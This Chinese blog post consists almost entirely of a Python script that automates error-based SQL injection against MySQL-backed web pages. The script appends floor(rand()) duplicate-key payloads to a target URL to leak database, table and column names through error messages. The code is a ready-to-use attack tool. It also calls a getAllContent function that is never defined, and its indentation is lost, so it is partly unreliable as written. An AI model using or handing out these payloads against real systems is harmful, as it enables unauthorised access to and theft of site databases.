python脚本实现半自动化报错注入

贴一个python写的报错注入脚本,就当保存一下代码,以后可以回头参考参考。

运行环境:python3

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import re

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

def main():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
get_all_databases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
get_db_all_tables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
get_db_tb_all_columns(options.url,options.database,options.table)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.database,options.table,options.column)

def http_get(url):
result = requests.get(url)
return result.text


def get_all_databases(url):
db_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)"
# print(db_nums_payload)
html = http_get(db_nums_payload)
# print(html)
result = re.search(r'~(.*?)~',html,re.S|re.I)
# print(result)
db_nums = int(result.group(1))
print("数据库的个数为:%d" % db_nums)

for x in range(db_nums):
db_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select schema_name from information_schema.schemata limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % x
html = http_get(db_name_payload)
# print(html)
result = re.search(r'~(.*?)~',html,re.S|re.I)
db_name = result.group(1)
print("第%d个数据库为:%s" % (x+1,db_name))



def get_db_all_tables(url,database):
tb_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % database
# print(tb_nums_payload)

html = http_get(tb_nums_payload)
# print(html)

result = re.search(r'~(.*?)~',html,re.S|re.I)

tb_nums = int(result.group(1))
print(database,"数据库中表的个数为:%d" % tb_nums)

for x in range(tb_nums):
tb_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,x)
# print(tb_name_payload)
html = http_get(tb_name_payload)
# print(html)
result = re.search(r'~(.*?)~',html,re.S|re.I)
tb_name = result.group(1)
print(database,"数据库第%d个数据库为:%s" % (x+1,tb_name))



def get_db_tb_all_columns(url,database,table):
co_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table)
html = http_get(co_nums_payload)
#print(html)

result = re.search(r'~(.*?)~',html,re.S|re.I)
co_nums = int(result.group(1))
# print(co_nums)
print("%s数据库中的%s表里面的字段个数为:%d" % (database,table,co_nums))

for x in range(co_nums):
co_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table,x)
html = http_get(co_name_payload)
result = re.search(r'~(.*?)~',html,re.S|re.I)
co_name = result.group(1)
print("%s数据库中%s表中的第%d个字段为:%s" % (database,table,x+1,co_name))


if __name__ == '__main__':
main()

运行结果:

mark